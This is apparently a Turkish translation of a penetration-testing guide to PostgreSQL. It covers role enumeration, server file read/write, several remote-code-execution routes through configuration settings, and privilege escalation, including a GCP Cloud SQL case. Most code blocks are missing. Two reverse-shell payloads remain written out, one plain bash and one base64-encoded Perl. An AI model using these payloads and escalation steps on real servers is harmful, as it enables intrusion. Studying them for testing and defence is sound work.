5432,5433 - Pentesting Postgresql
Dünyanın en gelişmiş topluluk araçlarıyla desteklenen iş akışlarını kolayca oluşturmak ve otomatikleştirmek için Trickest kullanın. Bugün Erişim Alın:
Temel Bilgiler
PostgreSQL, açık kaynak bir nesne-ilişkisel veritabanı sistemi olarak tanımlanmaktadır. Bu sistem yalnızca SQL dilini kullanmakla kalmaz, aynı zamanda onu ek özelliklerle geliştirir. Yetenekleri, geniş bir veri türü ve işlem yelpazesini yönetmesine olanak tanır, bu da onu geliştiriciler ve organizasyonlar için çok yönlü bir seçim haline getirir.
Varsayılan port: 5432, ve bu port zaten kullanılıyorsa, postgresql'in kullanılmayan bir sonraki portu (muhtemelen 5433) kullanacağı görünmektedir.
Bağlanma ve Temel Enum
Eğer \list
komutunu çalıştırdığınızda rdsadmin
adında bir veritabanı bulursanız, bir AWS postgresql veritabanası içinde olduğunuzu bilirsiniz.
Daha fazla bilgi için PostgreSQL veritabanını nasıl kötüye kullanacağınız hakkında kontrol edin:
PostgreSQL injectionOtomatik Sayım
Port taraması
Bu araştırmaya göre, bir bağlantı denemesi başarısız olduğunda, dblink
bir hata açıklaması içeren sqlclient_unable_to_establish_sqlconnection
istisnası fırlatır. Bu ayrıntıların örnekleri aşağıda listelenmiştir.
Sunucu kapalı
DETAY: sunucuya bağlanılamadı: Host'a giden yol yok. Sunucu "1.2.3.4" adresinde çalışıyor mu ve 5678 numaralı portta TCP/IP bağlantılarını kabul ediyor mu?
Port kapalı
Port açık
ya da
Port açık veya filtrelenmiş
In PL/pgSQL fonksiyonlarında, şu anda istisna ayrıntılarını elde etmek mümkün değildir. Ancak, PostgreSQL sunucusuna doğrudan erişiminiz varsa, gerekli bilgileri alabilirsiniz. Sistem tablolarından kullanıcı adları ve şifreleri çıkarmak mümkün değilse, önceki bölümde tartışılan kelime listesi saldırı yöntemini kullanmayı düşünebilirsiniz, çünkü bu olumlu sonuçlar verebilir.
Ayrıcalıkların Sayımı
Roller
Rol Türleri | |
---|---|
rolsuper | Rol süper kullanıcı ayrıcalıklarına sahiptir |
rolinherit | Rol, üyesi olduğu rollerin ayrıcalıklarını otomatik olarak devralır |
rolcreaterole | Rol daha fazla rol oluşturabilir |
rolcreatedb | Rol veritabanları oluşturabilir |
rolcanlogin | Rol giriş yapabilir. Yani, bu rol başlangıç oturum yetkilendirme tanımlayıcısı olarak verilebilir |
rolreplication | Rol bir çoğaltma rolüdür. Bir çoğaltma rolü, çoğaltma bağlantılarını başlatabilir ve çoğaltma slotlarını oluşturup kaldırabilir. |
rolconnlimit | Giriş yapabilen roller için, bu rolün yapabileceği maksimum eşzamanlı bağlantı sayısını ayarlar. -1 sınırsız anlamına gelir. |
rolpassword | Şifre değil (her zaman |
rolvaliduntil | Şifre sona erme zamanı (sadece şifre kimlik doğrulaması için kullanılır); sona erme yoksa null |
rolbypassrls | Rol, her satır düzeyinde güvenlik politikasını atlar, daha fazla bilgi için Bölüm 5.8 bakın. |
rolconfig | Çalışma zamanı yapılandırma değişkenleri için rol özel varsayılanları |
oid | Rolün kimliği |
İlginç Gruplar
Eğer
pg_execute_server_program
üyesiyseniz, programları çalıştırabilirsinizEğer
pg_read_server_files
üyesiyseniz, dosyaları okuyabilirsinizEğer
pg_write_server_files
üyesiyseniz, dosyaları yazabilirsiniz
Postgres'te bir kullanıcı, bir grup ve bir rol aynıdır. Bu sadece nasıl kullandığınıza ve giriş yapmasına izin verip vermediğinize bağlıdır.
Tablolar
Fonksiyonlar
Dosya sistemi eylemleri
Dizinleri ve dosyaları oku
Bu commit ile tanımlanan DEFAULT_ROLE_READ_SERVER_FILES
grubunun ( pg_read_server_files
olarak adlandırılır) ve süper kullanıcıların herhangi bir yol üzerinde COPY
yöntemini kullanabilirler ( genfile.c
içindeki convert_and_check_filename
'a bakın):
Unutmayın ki eğer süper kullanıcı değilseniz ama CREATEROLE izinleriniz varsa, kendinizi o grubun üyesi yapabilirsiniz:
Dosya okumak veya bir dizini listelemek için kullanılabilecek başka postgres fonksiyonları vardır. Sadece süper kullanıcılar ve açık izinlere sahip kullanıcılar bunları kullanabilir:
Daha fazla fonksiyon bulabilirsiniz https://www.postgresql.org/docs/current/functions-admin.html
Basit Dosya Yazma
Sadece süper kullanıcılar ve pg_write_server_files
üyeleri dosya yazmak için kopya kullanabilir.
Unutmayın ki eğer süper kullanıcı değilseniz ama CREATEROLE
izinleriniz varsa, kendinizi o grubun üyesi yapabilirsiniz:
COPY'nin yeni satır karakterlerini işleyemediğini unutmayın, bu nedenle bir base64 yükü kullanıyor olsanız bile tek satırlık bir komut göndermeniz gerekir.
Bu tekniğin çok önemli bir sınırlaması, copy
'nin bazı ikili değerleri değiştirdiği için ikili dosyaları yazmak için kullanılamamasıdır.
İkili dosya yükleme
Ancak, büyük ikili dosyaları yüklemek için başka teknikler vardır:
Big Binary Files Upload (PostgreSQL)Hata ödülü ipucu: Intigriti'ye kaydolun, hack'ler tarafından, hack'ler için oluşturulmuş premium bir hata ödülü platformu! Bugün https://go.intigriti.com/hacktricks adresine katılın ve $100,000'a kadar ödüller kazanmaya başlayın!
Yerel dosya yazma yoluyla PostgreSQL tablo verilerini güncelleme
PostgreSQL sunucu dosyalarını okuma ve yazma yetkisine sahipseniz, sunucudaki herhangi bir tabloyu ilişkili dosya düğümünü PostgreSQL veri dizininde üst üste yazarak güncelleyebilirsiniz. Bu teknik hakkında daha fazla bilgi burada.
Gerekli adımlar:
PostgreSQL veri dizinini elde edin
Not: Ayarlardan mevcut veri dizini yolunu alamıyorsanız, SELECT version()
sorgusu aracılığıyla ana PostgreSQL sürümünü sorgulayabilir ve yolu brute-force ile denemeye çalışabilirsiniz. PostgreSQL'in Unix kurulumlarındaki yaygın veri dizini yolları /var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/
şeklindedir. Yaygın bir küme adı main
'dir. 2. Hedef tablo ile ilişkili dosya düğümüne göre bir göreli yol elde edin
Bu sorgu base/3/1337
gibi bir şey döndürmelidir. Diskteki tam yol $DATA_DIRECTORY/base/3/1337
, yani /var/lib/postgresql/13/main/base/3/1337
olacaktır. 3. lo_*
fonksiyonları aracılığıyla dosya düğümünü indirin
Hedef tablo ile ilişkili veri türünü alın
PostgreSQL Dosya Düğümü Editörü kullanarak dosya düğümünü düzenleyin; tam izinler için tüm
rol*
boolean bayraklarını 1 olarak ayarlayın.
(İsteğe bağlı) Pahalı bir SQL sorgusu çalıştırarak bellek içi tablo önbelleğini temizleyin
Artık PostgreSQL'de güncellenmiş tablo değerlerini görmelisiniz.
Ayrıca pg_authid
tablosunu düzenleyerek süperadmin olabilirsiniz. Ayrıntılar için aşağıdaki bölüme bakın.
RCE
RCE ile program
9.3 sürümünden itibaren yalnızca süper kullanıcılar ve pg_execute_server_program
grubunun üyeleri RCE için copy kullanabilir (sızdırma ile örnek:
Örnek exec:
Unutmayın ki eğer süper kullanıcı değilseniz ama CREATEROLE
izinleriniz varsa, kendinizi o grubun üyesi yapabilirsiniz:
Ya da metasploit'ten multi/postgres/postgres_copy_from_program_cmd_exec
modülünü kullanabilirsiniz.
Bu güvenlik açığı hakkında daha fazla bilgi burada. CVE-2019-9193 olarak rapor edilmesine rağmen, Postges bunun bir özellik olduğunu ve düzeltmeyeceklerini açıkladı.
PostgreSQL Dilleri ile RCE
RCE with PostgreSQL LanguagesPostgreSQL uzantıları ile RCE
Önceki yazıdan ikili dosyaları nasıl yükleyeceğinizi öğrendikten sonra, bir postgresql uzantısı yükleyerek ve yükleyerek RCE elde etmeyi deneyebilirsiniz.
RCE with PostgreSQL ExtensionsPostgreSQL yapılandırma dosyası RCE
Aşağıdaki RCE vektörleri, tüm adımların iç içe geçmiş SELECT ifadeleri aracılığıyla gerçekleştirilebileceği kısıtlı SQLi bağlamlarında özellikle yararlıdır.
PostgreSQL'ün yapılandırma dosyası, veritabanını çalıştıran postgres kullanıcısı tarafından yazılabilir, bu nedenle superuser olarak, dosya sisteminde dosyalar yazabilir ve dolayısıyla bu dosyayı üzerine yazabilirsiniz.
ssl_passphrase_command ile RCE
Bu teknik hakkında daha fazla bilgi burada.
Yapılandırma dosyasında RCE'ye yol açabilecek bazı ilginç özellikler vardır:
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'
Veritabanının özel anahtarının yolussl_passphrase_command = ''
Özel dosya şifreyle korunuyorsa (şifreli) postgresql bu özellikte belirtilen komutu çalıştıracaktır.ssl_passphrase_command_supports_reload = off
Eğer bu özellik açık ise, şifreyle korunan anahtar için çalıştırılan komut,pg_reload_conf()
çalıştırıldığında çalıştırılacaktır.
Sonra, bir saldırganın yapması gerekenler:
Sunucudan özel anahtarı dökme
İndirilen özel anahtarı şifreleme:
rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key
Üzerine yazma
Mevcut postgresql yapılandırmasını dökme
Belirtilen özellikler yapılandırması ile yapılandırmayı üzerine yazma:
ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
ssl_passphrase_command_supports_reload = on
pg_reload_conf()
'ü çalıştırma
Bunu test ederken, bunun yalnızca özel anahtar dosyasının 640 ayrıcalığına sahip olması, root tarafından sahip olunması ve ssl-cert veya postgres grubuna ait olması (böylece postgres kullanıcısının okuyabilmesi) ve /var/lib/postgresql/12/main dizininde yer alması durumunda çalışacağını fark ettim.
archive_command ile RCE
Bu yapılandırma ve WAL hakkında daha fazla bilgi burada.
Yapılandırma dosyasında istismar edilebilecek bir diğer özellik archive_command
'dır.
Bunun çalışması için, archive_mode
ayarının 'on'
veya 'always'
olması gerekir. Eğer bu doğruysa, o zaman archive_command
içindeki komutu üzerine yazabilir ve WAL (write-ahead logging) işlemleri aracılığıyla çalıştırılmasını zorlayabiliriz.
Genel adımlar şunlardır:
Arşiv modunun etkin olup olmadığını kontrol et:
SELECT current_setting('archive_mode')
archive_command
'ı yükle ile üzerine yaz. Örneğin, bir ters shell:archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'
Yapılandırmayı yeniden yükle:
SELECT pg_reload_conf()
Arşiv komutunu çağıracak WAL işleminin çalışmasını zorla:
SELECT pg_switch_wal()
veya bazı Postgres sürümleri içinSELECT pg_switch_xlog()
preload kütüphaneleri ile RCE
Bu teknik hakkında daha fazla bilgi burada.
Bu saldırı vektörü, aşağıdaki yapılandırma değişkenlerinden yararlanmaktadır:
session_preload_libraries
-- PostgreSQL sunucusu tarafından istemci bağlantısında yüklenecek kütüphaneler.dynamic_library_path
-- PostgreSQL sunucusunun kütüphaneleri arayacağı dizinlerin listesi.
dynamic_library_path
değerini, veritabanını çalıştıran postgres
kullanıcısı tarafından yazılabilir bir dizine, örneğin /tmp/
dizinine ayarlayabilir ve oraya kötü niyetli bir .so
nesnesi yükleyebiliriz. Sonra, PostgreSQL sunucusunu, session_preload_libraries
değişkenine dahil ederek yeni yüklediğimiz kütüphaneyi yüklemeye zorlayacağız.
Saldırı adımları şunlardır:
Orijinal
postgresql.conf
dosyasını indirin/tmp/
dizininidynamic_library_path
değerine dahil edin, örneğindynamic_library_path = '/tmp:$libdir'
Kötü niyetli kütüphane adını
session_preload_libraries
değerine dahil edin, örneğinsession_preload_libraries = 'payload.so'
SELECT version()
sorgusu ile ana PostgreSQL sürümünü kontrol edinKötü niyetli kütüphane kodunu doğru PostgreSQL geliştirme paketi ile derleyin Örnek kod:
Kodu derleme:
Adım 2-3'te oluşturulan kötü niyetli
postgresql.conf
dosyasını yükleyin ve orijinal dosyanın üzerine yazınAdım 5'teki
payload.so
dosyasını/tmp
dizinine yükleyinSunucu yapılandırmasını sunucuyu yeniden başlatarak veya
SELECT pg_reload_conf()
sorgusunu çağırarak yeniden yükleyinBir sonraki DB bağlantısında, ters shell bağlantısını alacaksınız.
Postgres Privesc
CREATEROLE Privesc
Grant
Belgeler'e göre: CREATEROLE
ayrıcalığına sahip roller, superuser olmayan herhangi bir role üyeliği verebilir veya geri alabilir.
Yani, eğer CREATEROLE
izniniz varsa, kendinize diğer roller (superuser olmayan) için erişim verebilir ve dosyaları okuma & yazma ve komutları çalıştırma seçeneği elde edebilirsiniz:
Şifreyi Değiştir
Bu role sahip kullanıcılar, diğer süper kullanıcı olmayanların şifrelerini de değiştirebilir:
Privesc to SUPERUSER
Yerel kullanıcıların PostgreSQL'e herhangi bir şifre vermeden giriş yapabildiğini bulmak oldukça yaygındır. Bu nedenle, kod çalıştırma izinlerini topladıktan sonra, bu izinleri kullanarak SUPERUSER
rolünü elde edebilirsiniz:
Bu genellikle pg_hba.conf
dosyasındaki aşağıdaki satırlar nedeniyle mümkündür:
ALTER TABLE privesc
Bu yazıda kullanıcılara verilen ALTER TABLE ayrıcalığını kötüye kullanarak Postgres GCP'de privesc'in nasıl mümkün olduğu açıklanmaktadır.
Başka bir kullanıcıyı bir tablonun sahibi yapmak istediğinizde, bunu engelleyen bir hata almanız gerekir, ancak görünüşe göre GCP, GCP'deki superuser olmayan postgres kullanıcısına bu seçeneği vermiştir:
Bu fikri, INSERT/UPDATE/ANALYZE komutları bir indeks fonksiyonu olan bir tabloda çalıştırıldığında, fonksiyonun tablo sahibinin izinleriyle komutun bir parçası olarak çağrıldığını göz önünde bulundurarak birleştirirsek, bir fonksiyonla bir indeks oluşturmak ve o tablo üzerinde bir super user'a sahiplik izinleri vermek mümkündür. Ardından, sahibinin ayrıcalıklarını kullandığı için komutları çalıştırabilecek kötü niyetli fonksiyonla tablo üzerinde ANALYZE çalıştırılabilir.
Exploitation
Yeni bir tablo oluşturarak başlayın.
İndeks fonksiyonu için veri sağlamak amacıyla tabloya bazı alakasız içerikler ekleyin.
Yetkisiz komutların çalıştırılmasına izin veren bir kod yürütme yükü içeren kötü niyetli bir indeks fonksiyonu geliştirin.
Tablo sahibini "cloudsqladmin" olarak DEĞİŞTİRİN; bu, Cloud SQL'in veritabanını yönetmek ve bakımını yapmak için kullandığı GCP'nin süper kullanıcı rolüdür.
Tablo üzerinde bir ANALİZ işlemi gerçekleştirin. Bu işlem, PostgreSQL motorunu tablonun sahibi "cloudsqladmin" kullanıcısının bağlamına geçmeye zorlar. Sonuç olarak, kötü niyetli indeks fonksiyonu "cloudsqladmin" izinleriyle çağrılır ve böylece daha önce yetkisiz olan shell komutunun çalıştırılmasına olanak tanır.
PostgreSQL'de bu akış şöyle görünür: